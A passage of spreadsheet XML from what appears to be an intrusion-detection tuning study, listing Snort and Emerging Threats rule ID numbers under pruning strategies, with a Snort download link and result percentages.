    <t>2, 6, 22, 26, 34799, 2001219, 2001972, 2003068, 2008578, 2009099, 2011716, 2012252, 2012296, 2012647, 2012709, 2012710, 2012711, 2012712, 2013479, 2014380, 2015023, 2015856, 2016149, 2016683, 2016778, 2018124, 2018585, 2019102, 2019401, 2021195, 2023640, 2024217, 2025275, 2025712, 2025822, 2027390, 2027412, 2027757, 2029340, 2029575, 2033078, 2036252, 2038967, 2050281, 2053892, 2053893, 2100368, 2100369, 2100372, 2100373, 2100537, 2100538, 2100566, 2100579, 2101280, 2101413, 2101616, 2102003, 2102466, 2102924</t>
  </si>
  <si>
    <t>2, 6, 22, 26, 368, 369, 372, 373, 381, 382, 385, 396, 399, 401, 404, 449, 566, 579, 649, 650, 1010, 1136, 1280, 1413, 1447, 1616, 1735, 2003, 2004, 2049, 2050, 2339, 2418, 2924, 3679, 3822, 4060, 4990, 5318, 6699, 11263, 11968, 12065, 12066, 12632, 13913, 13974, 14019, 15517, 15850, 15873, 16008, 16282, 16301, 16418, 16510, 17110, 17152, 17494, 18174, 18474, 18611, 20212, 20528, 20566, 21214, 21232, 23493, 24304, 24889, 25664, 26317, 26989, 27899, 27938, 28039, 28069, 28313, 28321, 28555, 28556, 28557, 28993, 29509, 29519, 29639, 29957, 30342, 30490, 31136, 31212, 31341, 31399, 33561, 34799, 35180, 35193, 35527, 37545, 37909, 38038, 38104, 38381, 39320, 39488, 40186, 41054, 41055, 41056, 41057, 41061, 41063, 41065, 41066, 41067, 41068, 41071, 41072, 41074, 41075, 41077, 41186, 42016, 42017, 42255, 42340, 42946, 43359, 43362, 43496, 43755, 44416, 44455, 44651, 44679, 45578, 45941, 46373, 47082, 48134, 48326, 48331, 48894, 50633, 51000, 51127, 51284, 51333, 51344, 57878, 65062</t>
  </si>
  <si>
    <t>2000428, 2000537, 2000538, 2000545, 2001219, 2001264, 2001331, 2001353, 2001384, 2001404, 2001608, 2001904, 2001972, 2002826, 2002948, 2003006, 2003068, 2003310, 2008470, 2008578, 2009583, 2009584, 2009767, 2009886, 2009970, 2010518, 2010816, 2011368, 2011408, 2011411, 2011716, 2011764, 2012063, 2012296, 2012709, 2012710, 2012711, 2012712, 2013273, 2013479, 2014380, 2014384, 2015023, 2015856, 2016149, 2016662, 2016683, 2016778, 2018124, 2018585, 2019102, 2019401, 2020632, 2021195, 2021630, 2023640, 2024217, 2024930, 2025275, 2025712, 2025822, 2027390, 2027412, 2027757, 2027759, 2027865, 2029340, 2029575, 2030390, 2030835, 2031489, 2031490, 2031491, 2033078, 2036222, 2036223, 2036252, 2036751, 2038967, 2043304, 2045173, 2049956, 2049957, 2050281, 2053892, 2053893, 2062459, 2062460, 2100312, 2100368, 2100369, 2100372, 2100373, 2100381, 2100382, 2100385, 2100396, 2100399, 2100401, 2100404, 2100485, 2100486, 2100524, 2100537, 2100538, 2100566, 2100579, 2100613, 2100628, 2100649, 2100650, 2101280, 2101413, 2101616, 2101917, 2102003, 2102049, 2102336,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</si>
  <si>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2, 6, 22, 26, 368, 369, 372, 373, 381, 382, 385, 396, 399, 401, 404, 449, 566, 579, 649, 650, 1010, 1136, 1280, 1413, 1447, 1616, 1735, 2003, 2004, 2049, 2050, 2339, 2418, 2924, 3679, 3822, 4060, 4990, 5318, 6699, 11263, 11968, 12065, 12066, 12632, 13913, 13974, 14019, 15517, 15850, 15873, 16008, 16282, 16301, 16418, 16510, 17110, 17152, 17494, 18174, 18474, 18611, 20212, 20528, 20566, 21214, 21232, 23493, 24304, 24889, 25664, 26317, 26989, 27899, 27938, 28039, 28069, 28313, 28321, 28555, 28556, 28557, 28993, 29509, 29519, 29639, 29957, 30342, 30490, 31136, 31212, 31341, 31399, 33561, 34799, 35180, 35193, 35527, 37545, 37909, 38038, 38104, 38381, 39320, 39488, 40186, 41054, 41055, 41056, 41057, 41061, 41063, 41065, 41066, 41067, 41068, 41071, 41072, 41074, 41075, 41077, 41186, 42016, 42017, 42255, 42340, 42946, 43359, 43362, 43496, 43755, 44416, 44455, 44651, 44679, 45578, 45941, 46373, 47082, 48134, 48326, 48331, 48894, 50633, 51000, 51127, 51284, 51333, 51344, 57878, 65062, 2000428, 2000537, 2000538, 2000545, 2001219, 2001264, 2001331, 2001353, 2001384, 2001404, 2001608, 2001904, 2001972, 2002826, 2002948, 2003006, 2003068, 2003310, 2008470, 2008578, 2009583, 2009584, 2009767, 2009886, 2009970, 2010518, 2010816, 2011368, 2011408, 2011411, 2011716, 2011764, 2012063, 2012296, 2012709, 2012710, 2012711, 2012712, 2013273, 2013479, 2014380, 2014384, 2015023, 2015856, 2016149, 2016662, 2016683, 2016778, 2018124, 2018585, 2019102, 2019401, 2020632, 2021195, 2021630, 2023640, 2024217, 2024930, 2025275, 2025712, 2025822, 2027390, 2027412, 2027757, 2027759, 2027865, 2029340, 2029575, 2030390, 2030835, 2031489, 2031490, 2031491, 2033078, 2036222, 2036223, 2036252, 2036751, 2038967, 2043304, 2045173, 2049956, 2049957, 2050281, 2053892, 2053893, 2062459, 2062460, 2100312, 2100368, 2100369, 2100372, 2100373, 2100381, 2100382, 2100385, 2100396, 2100399, 2100401, 2100404, 2100485, 2100486, 2100524, 2100537, 2100538, 2100566, 2100579, 2100613, 2100628, 2100649, 2100650, 2101280, 2101413, 2101616, 2101917, 2102003, 2102049, 2102336,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</si>
  <si>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2, 6, 22, 26, 368, 369, 372, 373, 381, 382, 385, 396, 399, 401, 404, 449, 566, 579, 613, 649, 650, 1010, 1136, 1280, 1413, 1447, 1546, 1616, 1735, 2003, 2004, 2049, 2050, 2339, 2418, 2924, 11968, 27899, 28555, 28556, 28557, 31136, 34799, 42255, 42340, 2001219, 2001972, 2003068, 2008578, 2009099, 2011716, 2012252, 2012296, 2012647, 2012709, 2012710, 2012711, 2012712, 2013479, 2014380, 2015023, 2015856, 2016149, 2016683, 2016778, 2018124, 2018585, 2019102, 2019401, 2021195, 2023640, 2024217, 2025275, 2025712, 2025822, 2027390, 2027412, 2027757, 2029340, 2029575, 2033078, 2036252, 2038967, 2050281, 2053892, 2053893, 2100368, 2100369, 2100372, 2100373, 2100537, 2100538, 2100566, 2100579, 2101280, 2101413, 2101616, 2102003, 2102466, 2102924</t>
  </si>
  <si>
    <t>1, 2, 3, 4, 5, 6, 7, 8, 12, 14, 15, 18, 19, 20, 22, 26, 28, 31, 33, 34799, 41978, 42944</t>
  </si>
  <si>
    <t>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2024297, 2025275, 2025649, 2025650, 2025712, 2025822, 2025992, 2027390, 2027412, 2027413, 2027757, 2029340, 2029575, 2033078, 2036252, 2038967, 2050281, 2053892, 2053893, 2100366, 2100368, 2100369, 2100372, 2100373, 2100537, 2100538, 2100566, 2100579, 2101280, 2101411, 2101413, 2101616, 2102003, 2102465, 2102466, 2102924</t>
  </si>
  <si>
    <t>1, 2, 3, 4, 5, 6, 7, 8, 12, 14, 15, 18, 19, 20, 22, 26, 28, 31, 33, 34799, 41978, 42944, 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2024297, 2025275, 2025649, 2025650, 2025712, 2025822, 2025992, 2027390, 2027412, 2027413, 2027757, 2029340, 2029575, 2033078, 2036252, 2038967, 2050281, 2053892, 2053893, 2100366, 2100368, 2100369, 2100372, 2100373, 2100537, 2100538, 2100566, 2100579, 2101280, 2101411, 2101413, 2101616, 2102003, 2102465, 2102466, 2102924</t>
  </si>
  <si>
    <t>1, 2, 3, 4, 5, 6, 7, 8, 12, 14, 15, 18, 19, 20, 22, 26, 28, 31, 33, 254, 366, 368, 369, 372, 373, 381, 382, 384, 385, 396, 399, 401, 402, 404, 408, 449, 451, 453, 566, 579, 649, 650, 853, 882, 895, 1010, 1136, 1201, 1280, 1394, 1411, 1413, 1417, 1418, 1420, 1421, 1447, 1448, 1616, 1735, 1917, 2003, 2004, 2049, 2050, 2339, 2418, 2924, 3679, 3822, 4060, 4990, 5318, 5730, 6699, 11192, 11263, 11968, 12065, 12066, 12632, 13913, 13974, 14019, 15306, 15517, 15850, 15873, 16008, 16282, 16301, 16418, 16510, 16642, 17110, 17152, 17458, 17494, 18174, 18474, 18611, 20212, 20528, 20566, 21214, 21232, 22097, 23362, 23493, 23861, 24096, 24303, 24304, 24889, 25664, 26317, 26989, 27899, 27938, 28039, 28069, 28313, 28321, 28555, 28556, 28557, 28993, 29456, 29509, 29519, 29639, 29957, 30342, 30490, 31136, 31212, 31341, 31399, 31767, 32481, 33561, 34799, 35180, 35193, 35527, 36650, 37545, 37909, 38038, 38104, 38381, 39320, 39488, 40186, 41054, 41055, 41056, 41057, 41061, 41063, 41065, 41066, 41067, 41068, 41071, 41072, 41074, 41075, 41077, 41186, 41742, 41978, 42016, 42017, 42255, 42340, 42944, 42946, 43359, 43362, 43496, 43755, 43808, 44416, 44455, 44484, 44485, 44486, 44487, 44488, 44489, 44651, 44679, 45578, 45941, 46373, 47082, 48134, 48326, 48331, 48894, 49040, 50447, 50633, 51000, 51127, 51284, 51333, 51344, 57756, 57878, 59258, 59597, 65062</t>
  </si>
  <si>
    <t>2000428, 2000537, 2000538, 2000545, 2001117, 2001219, 2001264, 2001329, 2001330, 2001331, 2001353, 2001384, 2001404, 2001608, 2001904, 2001972, 2002749, 2002752, 2002826, 2002948, 2003006, 2003012, 2003020, 2003068, 2003099, 2003310, 2003595, 2006408, 2006409, 2008470, 2008578, 2009151, 2009205, 2009206, 2009207, 2009208, 2009582, 2009583, 2009584, 2009767, 2009768, 2009886, 2009970, 2010518, 2010706, 2010816, 2010935, 2010936, 2010937, 2010938, 2010939, 2011368, 2011408, 2011411, 2011716, 2011764, 2012063, 2012296, 2012709, 2012710, 2012711, 2012712, 2013273, 2013479, 2013490, 2013491, 2014380, 2014384, 2015023, 2015856, 2016149, 2016662, 2016683, 2016778, 2018124, 2018585, 2019102, 2019401, 2020632, 2021195, 2021630, 2022218, 2023640, 2023753, 2023997, 2024217, 2024297, 2024766, 2024930, 2025275, 2025649, 2025650, 2025712, 2025822, 2025992, 2027390, 2027412, 2027413, 2027757, 2027759, 2027865, 2029340, 2029575, 2030390, 2030835, 2031489, 2031490, 2031491, 2033078, 2034857, 2036222, 2036223, 2036252, 2036751, 2038967, 2043304, 2044665, 2044666, 2045173, 2049956, 2049957, 2050281, 2053892, 2053893, 2059172, 2062459, 2062460, 2067085, 2067086, 2067087, 2100254, 2100312, 2100366, 2100368, 2100369, 2100372, 2100373, 2100381, 2100382, 2100384, 2100385, 2100396, 2100399, 2100401, 2100402, 2100404, 2100408, 2100453, 2100469, 2100472, 2100485, 2100486, 2100524, 2100525, 2100527, 2100537, 2100538, 2100566, 2100579, 2100613, 2100615, 2100628, 2100649, 2100650, 2101280, 2101411, 2101413, 2101417, 2101418, 2101420, 2101447, 2101616, 2101620, 2101852, 2101917, 2102003, 2102049, 2102336, 2102465,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</si>
  <si>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1, 2, 3, 4, 5, 6, 7, 8, 12, 14, 15, 18, 19, 20, 22, 26, 28, 31, 33, 254, 366, 368, 369, 372, 373, 381, 382, 384, 385, 396, 399, 401, 402, 404, 408, 449, 451, 453, 566, 579, 649, 650, 853, 882, 895, 1010, 1136, 1201, 1280, 1394, 1411, 1413, 1417, 1418, 1420, 1421, 1447, 1448, 1616, 1735, 1917, 2003, 2004, 2049, 2050, 2339, 2418, 2924, 3679, 3822, 4060, 4990, 5318, 5730, 6699, 11192, 11263, 11968, 12065, 12066, 12632, 13913, 13974, 14019, 15306, 15517, 15850, 15873, 16008, 16282, 16301, 16418, 16510, 16642, 17110, 17152, 17458, 17494, 18174, 18474, 18611, 20212, 20528, 20566, 21214, 21232, 22097, 23362, 23493, 23861, 24096, 24303, 24304, 24889, 25664, 26317, 26989, 27899, 27938, 28039, 28069, 28313, 28321, 28555, 28556, 28557, 28993, 29456, 29509, 29519, 29639, 29957, 30342, 30490, 31136, 31212, 31341, 31399, 31767, 32481, 33561, 34799, 35180, 35193, 35527, 36650, 37545, 37909, 38038, 38104, 38381, 39320, 39488, 40186, 41054, 41055, 41056, 41057, 41061, 41063, 41065, 41066, 41067, 41068, 41071, 41072, 41074, 41075, 41077, 41186, 41742, 41978, 42016, 42017, 42255, 42340, 42944, 42946, 43359, 43362, 43496, 43755, 43808, 44416, 44455, 44484, 44485, 44486, 44487, 44488, 44489, 44651, 44679, 45578, 45941, 46373, 47082, 48134, 48326, 48331, 48894, 49040, 50447, 50633, 51000, 51127, 51284, 51333, 51344, 57756, 57878, 59258, 59597, 65062, 2000428, 2000537, 2000538, 2000545, 2001117, 2001219, 2001264, 2001329, 2001330, 2001331, 2001353, 2001384, 2001404, 2001608, 2001904, 2001972, 2002749, 2002752, 2002826, 2002948, 2003006, 2003012, 2003020, 2003068, 2003099, 2003310, 2003595, 2006408, 2006409, 2008470, 2008578, 2009151, 2009205, 2009206, 2009207, 2009208, 2009582, 2009583, 2009584, 2009767, 2009768, 2009886, 2009970, 2010518, 2010706, 2010816, 2010935, 2010936, 2010937, 2010938, 2010939, 2011368, 2011408, 2011411, 2011716, 2011764, 2012063, 2012296, 2012709, 2012710, 2012711, 2012712, 2013273, 2013479, 2013490, 2013491, 2014380, 2014384, 2015023, 2015856, 2016149, 2016662, 2016683, 2016778, 2018124, 2018585, 2019102, 2019401, 2020632, 2021195, 2021630, 2022218, 2023640, 2023753, 2023997, 2024217, 2024297, 2024766, 2024930, 2025275, 2025649, 2025650, 2025712, 2025822, 2025992, 2027390, 2027412, 2027413, 2027757, 2027759, 2027865, 2029340, 2029575, 2030390, 2030835, 2031489, 2031490, 2031491, 2033078, 2034857, 2036222, 2036223, 2036252, 2036751, 2038967, 2043304, 2044665, 2044666, 2045173, 2049956, 2049957, 2050281, 2053892, 2053893, 2059172, 2062459, 2062460, 2067085, 2067086, 2067087, 2100254, 2100312, 2100366, 2100368, 2100369, 2100372, 2100373, 2100381, 2100382, 2100384, 2100385, 2100396, 2100399, 2100401, 2100402, 2100404, 2100408, 2100453, 2100469, 2100472, 2100485, 2100486, 2100524, 2100525, 2100527, 2100537, 2100538, 2100566, 2100579, 2100613, 2100615, 2100628, 2100649, 2100650, 2101280, 2101411, 2101413, 2101417, 2101418, 2101420, 2101447, 2101616, 2101620, 2101852, 2101917, 2102003, 2102049, 2102336, 2102465,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</si>
  <si>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1, 2, 3, 4, 5, 6, 7, 8, 12, 14, 15, 18, 19, 20, 22, 26, 28, 31, 33, 254, 366, 368, 369, 372, 373, 381, 382, 384, 385, 396, 399, 401, 402, 404, 408, 449, 451, 453, 566, 579, 613, 649, 650, 853, 882, 895, 1010, 1136, 1201, 1280, 1394, 1411, 1413, 1417, 1418, 1420, 1421, 1447, 1448, 1546, 1616, 1735, 1852, 1917, 2003, 2004, 2049, 2050, 2339, 2418, 2924, 11968, 27899, 28555, 28556, 28557, 29456, 31136, 34799, 41978, 42255, 42340, 42944, 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2024297, 2025275, 2025649, 2025650, 2025712, 2025822, 2025992, 2027390, 2027412, 2027413, 2027757, 2029340, 2029575, 2033078, 2036252, 2038967, 2050281, 2053892, 2053893, 2100366, 2100368, 2100369, 2100372, 2100373, 2100537, 2100538, 2100566, 2100579, 2101280, 2101411, 2101413, 2101616, 2102003, 2102465, 2102466, 2102924</t>
  </si>
  <si>
    <t>1, 2, 3, 4, 6, 7, 8, 14, 19, 22, 26, 34799, 42944</t>
  </si>
  <si>
    <t>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2024297, 2025275, 2025650, 2025712, 2025822, 2027390, 2027412, 2027757, 2029340, 2029575, 2033078, 2036252, 2038967, 2050281, 2053892, 2053893, 2100368, 2100369, 2100372, 2100373, 2100537, 2100538, 2100566, 2100579, 2101280, 2101413, 2101616, 2102003, 2102465, 2102466, 2102924</t>
  </si>
  <si>
    <t>1, 2, 3, 4, 6, 7, 8, 14, 19, 22, 26, 28, 34799, 42944, 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2025275, 2025712, 2025822, 2027390, 2027412, 2027413, 2027757, 2029340, 2029575, 2033078, 2036252, 2038967, 2050281, 2053892, 2053893, 2100366, 2100368, 2100369, 2100372, 2100373, 2100537, 2100538, 2100566, 2100579, 2101280, 2101413, 2101616, 2102003, 2102465, 2102466, 2102924</t>
  </si>
  <si>
    <t>1, 2, 3, 4, 5, 6, 7, 8, 18, 19, 22, 26, 28, 254, 368, 369, 372, 373, 381, 382, 385, 396, 399, 401, 404, 449, 566, 579, 649, 650, 853, 882, 895, 1010, 1136, 1201, 1280, 1413, 1417, 1418, 1420, 1447, 1448, 1616, 1735, 1917, 2003, 2004, 2049, 2050, 2339, 2418, 2924, 3679, 3822, 4060, 4990, 5318, 5730, 6699, 11263, 11968, 12065, 12066, 12632, 13913, 13974, 14019, 15517, 15850, 15873, 16008, 16282, 16301, 16418, 16510, 16642, 17110, 17152, 17458, 17494, 18174, 18474, 18611, 20212, 20528, 20566, 21214, 21232, 23493, 23861, 24096, 24304, 24889, 25664, 26317, 26989, 27899, 27938, 28039, 28069, 28313, 28321, 28555, 28556, 28557, 28993, 29509, 29519, 29639, 29957, 30342, 30490, 31136, 31212, 31341, 31399, 32481, 33561, 34799, 35180, 35193, 35527, 37545, 37909, 38038, 38104, 38381, 39320, 39488, 40186, 41054, 41055, 41056, 41057, 41061, 41063, 41065, 41066, 41067, 41068, 41071, 41072, 41074, 41075, 41077, 41186, 42016, 42017, 42255, 42340, 42944, 42946, 43359, 43362, 43496, 43755, 43808, 44416, 44455, 44486, 44489, 44651, 44679, 45578, 45941, 46373, 47082, 48134, 48326, 48331, 48894, 49040, 50633, 51000, 51127, 51284, 51333, 51344, 57756, 57878, 59258, 65062</t>
  </si>
  <si>
    <t>2000428, 2000537, 2000538, 2000545, 2001117, 2001219, 2001264, 2001329, 2001330, 2001331, 2001353, 2001384, 2001404, 2001608, 2001904, 2001972, 2002826, 2002948, 2003006, 2003012, 2003020, 2003068, 2003099, 2003310, 2003595, 2006408, 2006409, 2008470, 2008578, 2009151, 2009582, 2009583, 2009584, 2009767, 2009768, 2009886, 2009970, 2010518, 2010706, 2010816, 2010935, 2010936, 2010937, 2010938, 2010939, 2011368, 2011408, 2011411, 2011716, 2011764, 2012063, 2012296, 2012709, 2012710, 2012711, 2012712, 2013273, 2013479, 2013490, 2013491, 2014380, 2014384, 2015023, 2015856, 2016149, 2016662, 2016683, 2016778, 2018124, 2018585, 2019102, 2019401, 2020632, 2021195, 2021630, 2022218, 2023640, 2023753, 2023997, 2024217, 2024297, 2024766, 2024930, 2025275, 2025650, 2025712, 2025822, 2027390, 2027412, 2027413, 2027757, 2027759, 2027865, 2029340, 2029575, 2030390, 2030835, 2031489, 2031490, 2031491, 2033078, 2034857, 2036222, 2036223, 2036252, 2036751, 2038967, 2043304, 2044665, 2044666, 2045173, 2049956, 2049957, 2050281, 2053892, 2053893, 2062459, 2062460, 2100254, 2100312, 2100366, 2100368, 2100369, 2100372, 2100373, 2100381, 2100382, 2100384, 2100385, 2100396, 2100399, 2100401, 2100402, 2100404, 2100408, 2100453, 2100469, 2100472, 2100485, 2100486, 2100524, 2100537, 2100538, 2100566, 2100579, 2100613, 2100615, 2100628, 2100649, 2100650, 2101280, 2101411, 2101413, 2101417, 2101418, 2101420, 2101447, 2101616, 2101620, 2101852, 2101917, 2102003, 2102049, 2102336, 2102465,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</si>
  <si>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1, 2, 3, 4, 5, 6, 7, 8, 14, 15, 18, 19, 20, 22, 26, 28, 33, 254, 368, 369, 372, 373, 381, 382, 385, 396, 399, 401, 404, 408, 449, 566, 579, 649, 650, 853, 882, 895, 1010, 1136, 1201, 1280, 1411, 1413, 1417, 1418, 1420, 1421, 1447, 1448, 1616, 1735, 1917, 2003, 2004, 2049, 2050, 2339, 2418, 2924, 3679, 3822, 4060, 4990, 5318, 6699, 11263, 11968, 12065, 12066, 12632, 13913, 13974, 14019, 15517, 15850, 15873, 16008, 16282, 16301, 16418, 16510, 16642, 17110, 17152, 17458, 17494, 18174, 18474, 18611, 20212, 20528, 20566, 21214, 21232, 22097, 23362, 23493, 23861, 24096, 24304, 24889, 25664, 26317, 26989, 27899, 27938, 28039, 28069, 28313, 28321, 28555, 28556, 28557, 28993, 29509, 29519, 29639, 29957, 30342, 30490, 31136, 31212, 31341, 31399, 32481, 33561, 34799, 35180, 35193, 35527, 37545, 37909, 38038, 38104, 38381, 39320, 39488, 40186, 41054, 41055, 41056, 41057, 41061, 41063, 41065, 41066, 41067, 41068, 41071, 41072, 41074, 41075, 41077, 41186, 42016, 42017, 42255, 42340, 42944, 42946, 43359, 43362, 43496, 43755, 43808, 44416, 44455, 44486, 44489, 44651, 44679, 45578, 45941, 46373, 47082, 48134, 48326, 48331, 48894, 49040, 50447, 50633, 51000, 51127, 51284, 51333, 51344, 57756, 57878, 59258, 59597, 65062, 2000428, 2000537, 2000538, 2000545, 2001117, 2001219, 2001264, 2001329, 2001330, 2001331, 2001353, 2001384, 2001404, 2001608, 2001904, 2001972, 2002749, 2002826, 2002948, 2003006, 2003012, 2003020, 2003068, 2003099, 2003310, 2003595, 2006408, 2006409, 2008470, 2008578, 2009151, 2009582, 2009583, 2009584, 2009767, 2009768, 2009886, 2009970, 2010518, 2010706, 2010816, 2010935, 2010936, 2010937, 2010938, 2010939, 2011368, 2011408, 2011411, 2011716, 2011764, 2012063, 2012296, 2012709, 2012710, 2012711, 2012712, 2013273, 2013479, 2013490, 2013491, 2014380, 2014384, 2015023, 2015856, 2016149, 2016662, 2016683, 2016778, 2018124, 2018585, 2019102, 2019401, 2020632, 2021195, 2021630, 2022218, 2023640, 2023753, 2023997, 2024217, 2024766, 2024930, 2025275, 2025650, 2025712, 2025822, 2027390, 2027412, 2027413, 2027757, 2027759, 2027865, 2029340, 2029575, 2030390, 2030835, 2031489, 2031490, 2031491, 2033078, 2034857, 2036222, 2036223, 2036252, 2036751, 2038967, 2043304, 2044665, 2044666, 2045173, 2049956, 2049957, 2050281, 2053892, 2053893, 2059172, 2062459, 2062460, 2100254, 2100312, 2100366, 2100368, 2100369, 2100372, 2100373, 2100381, 2100382, 2100384, 2100385, 2100396, 2100399, 2100401, 2100402, 2100404, 2100408, 2100453, 2100469, 2100472, 2100485, 2100486, 2100524, 2100525, 2100527, 2100537, 2100538, 2100566, 2100579, 2100613, 2100615, 2100628, 2100649, 2100650, 2101280, 2101413, 2101418, 2101420, 2101447, 2101616, 2101620, 2101852, 2101917, 2102003, 2102049, 2102336, 2102465, 2102466, 2102924, 2102925,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</si>
  <si>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368, 369, 372, 373, 381, 382, 385, 396, 399, 401, 404, 449, 566, 579, 613, 649, 650, 853, 882, 895, 1010, 1136, 1201, 1280, 1413, 1417, 1418, 1420, 1447, 1448, 1546, 1616, 1735, 1852, 2003, 2004, 2049, 2050, 2339, 2418, 2924, 11968, 27899, 28555, 28556, 28557, 31136, 41978, 42255, 42340, 42944</t>
  </si>
  <si>
    <t>1, 2, 3, 4, 5, 6, 7, 8, 14, 19, 22, 26, 28, 254, 368, 369, 372, 373, 381, 382, 385, 396, 399, 401, 404, 449, 566, 579, 613, 649, 650, 853, 882, 895, 1010, 1136, 1201, 1280, 1413, 1417, 1418, 1420, 1421, 1447, 1448, 1546, 1616, 1735, 1852, 2003, 2004, 2049, 2050, 2339, 2418, 2924, 11968, 27899, 28555, 28556, 28557, 31136, 34799, 42255, 42340, 42944, 2001219, 2001330, 2001972, 2002911, 2003068, 2008578, 2009099, 2010935, 2010936, 2010937, 2010938, 2010939, 2011716, 2012252, 2012296, 2012647, 2012709, 2012710, 2012711, 2012712, 2013479, 2014380, 2015023, 2015856, 2016149, 2016683, 2016778, 2018124, 2018585, 2019102, 2019401, 2021195, 2023640, 2023753, 2024217, 2025275, 2025712, 2025822, 2027390, 2027412, 2027413, 2027757, 2029340, 2029575, 2033078, 2036252, 2038967, 2050281, 2053892, 2053893, 2100366, 2100368, 2100369, 2100372, 2100373, 2100537, 2100538, 2100566, 2100579, 2101280, 2101411, 2101413, 2101616, 2102003, 2102465, 2102466, 2102924</t>
  </si>
  <si>
    <t>Aggressive pruning (eliminando los SIDs TP, de mayor a menor #Flow-correlated Alert, si mejoran el rendimiento)</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FFCC00CC"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Aggressive Pruning</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> (eliminando los SIDs sólo FP y, además, los SIDs TP, de mayor a menor #Flow-correlated Alert, si mejoran el rendimiento)</t>
    </r>
  </si>
  <si>
    <t>No Prunning</t>
  </si>
  <si>
    <t>https://www.snort.org/downloads
Community: community-rules.tar.gz
Registered: snortrules-snapshot-xxx.tar.gz</t>
  </si>
  <si>
    <t>53.64%</t>
  </si>
  <si>
    <t>1, 5, 12, 14, 15, 19, 20, 28, 42944</t>
  </si>
  <si>
    <t>2001219, 2008578, 2010935, 2010937, 2010939, 2011716, 2019401, 2025649, 2025650, 2025992, 2101280, 2101411, 2102924</t>
  </si>
  <si>
    <t>1, 5, 12, 14, 15, 19, 20, 28, 42944, 2001219, 2008578, 2010935, 2010937, 2010939, 2011716, 2019401, 2025649, 2025650, 2025992, 2101280, 2101411, 2102924</t>
  </si>
  <si>
    <t>1, 4, 5, 12, 14, 15, 19, 20, 28, 254, 1411, 1417, 2924, 11192, 13974, 15306, 16418, 20212, 20528, 27938, 28069, 28993, 29456, 29957, 31767, 32481, 40186, 42340, 42944, 43496, 44484, 44485, 44486, 44487, 44488, 44489, 50447, 50633, 51127, 57756, 59258</t>
  </si>
  <si>
    <t>2001219, 2002749, 2002752, 2002948, 2003020, 2003099, 2003595, 2008578, 2009582, 2009767, 2009768, 2010935, 2010937, 2010939, 2011411, 2011716, 2014384, 2019401, 2021630, 2022218, 2024766, 2025649, 2025650, 2025992, 2027759, 2027865, 2034857, 2100254, 2100312, 2100469, 2100615, 2101280, 2101411, 2101417, 2102924, 2403542</t>
  </si>
  <si>
    <t>1, 4, 5, 12, 14, 15, 19, 20, 28, 254, 1411, 1417, 2924, 11192, 13974, 15306, 16418, 20212, 20528, 27938, 28069, 28993, 29456, 29957, 31767, 32481, 40186, 42340, 42944, 43496, 44484, 44485, 44486, 44487, 44488, 44489, 50447, 50633, 51127, 57756, 59258, 2001219, 2002749, 2002752, 2002948, 2003020, 2003099, 2003595, 2008578, 2009582, 2009767, 2009768, 2010935, 2010937, 2010939, 2011411, 2011716, 2014384, 2019401, 2021630, 2022218, 2024766, 2025649, 2025650, 2025992, 2027759, 2027865, 2034857, 2100254, 2100312, 2100469, 2100615, 2101280, 2101411, 2101417, 2102924, 2403542</t>
  </si>
  <si>
    <t>254, 385, 1201, 1280, 1411, 1417, 2924, 28556, 29456, 42340, 42944</t>
  </si>
  <si>
    <t>1, 5, 12, 14, 15, 19, 20, 28, 254, 385, 1201, 1280, 1411, 1417, 2924, 28556, 29456, 42340, 42944, 2001219, 2008578, 2010935, 2010937, 2010939, 2011716, 2019401, 2025649, 2025650, 2025992, 2101280, 2101411, 2102924</t>
  </si>
  <si>
    <t>10.00%</t>
  </si>
  <si>
    <t>40.91%</t>
  </si>
  <si>
    <t>71.82%</t>
  </si>
  <si>
    <t>28.18%</t>
  </si>
  <si>
    <t>50.91%</t>
  </si>
  <si>
    <t>2001219, 2008578, 2010935, 2010937, 2011716, 2019401, 2025649, 2025650, 2025992, 2101411, 2102924</t>
  </si>
  <si>
    <t>1, 5, 12, 14, 15, 19, 20, 28, 42944, 2001219, 2008578, 2010935, 2010937, 2011716, 2019401, 2025649, 2025650, 2025992, 2101411, 2102924</t>
  </si>
  <si>
    <t>1, 4, 12, 14, 15, 19, 20, 28, 254, 1411, 1417, 2924, 20212, 20528, 27938, 28993, 29456, 29957, 31767, 32481, 40186, 42340, 42944, 43496, 44484, 44485, 44486, 44487, 44488, 44489, 50447, 50633, 51127, 57756</t>
  </si>
  <si>
    <t>2001219, 2002749, 2002752, 2002948, 2003020, 2003099, 2003595, 2008578, 2009582, 2009767, 2009768, 2010935, 2010937, 2011716, 2014384, 2019401, 2021630, 2022218, 2024766, 2025649, 2025650, 2025992, 2027759, 2027865, 2034857, 2100254, 2101411, 2101417, 2102924</t>
  </si>
  <si>
    <t>1, 4, 12, 14, 15, 19, 20, 28, 254, 1411, 1417, 2924, 20212, 20528, 27938, 28993, 29456, 29957, 31767, 32481, 40186, 42340, 42944, 43496, 44484, 44485, 44486, 44487, 44488, 44489, 50447, 50633, 51127, 57756, 2001219, 2002749, 2002752, 2002948, 2003020, 2003099, 2003595, 2008578, 2009582, 2009767, 2009768, 2010935, 2010937, 2011716, 2014384, 2019401, 2021630, 2022218, 2024766, 2025649, 2025650, 2025992, 2027759, 2027865, 2034857, 2100254, 2101411, 2101417, 2102924</t>
  </si>
  <si>
    <t>254, 1411, 1417, 2924, 29456, 42340, 42944</t>
  </si>
  <si>
    <t>1, 5, 12, 14, 15, 19, 20, 28, 254, 1411, 1417, 2924, 29456, 42340, 42944, 2001219, 2008578, 2010935, 2010937, 2011716, 2019401, 2025649, 2025650, 2025992, 2101411, 2102924</t>
  </si>
  <si>
    <t>2, 18, 26, 28, 34799</t>
  </si>
  <si>
    <t>2001219, 2003068, 2008578, 2009099, 2011716, 2012252, 2012296, 2012647, 2014380, 2015856, 2016683, 2016778, 2018585, 2019102, 2019401, 2021195, 2023640, 2024217, 2025712, 2025822, 2027412, 2027757, 2029340, 2029575, 2053892, 2053893, 2100579, 2101280, 2101413, 2101616, 2102003, 2102924</t>
  </si>
  <si>
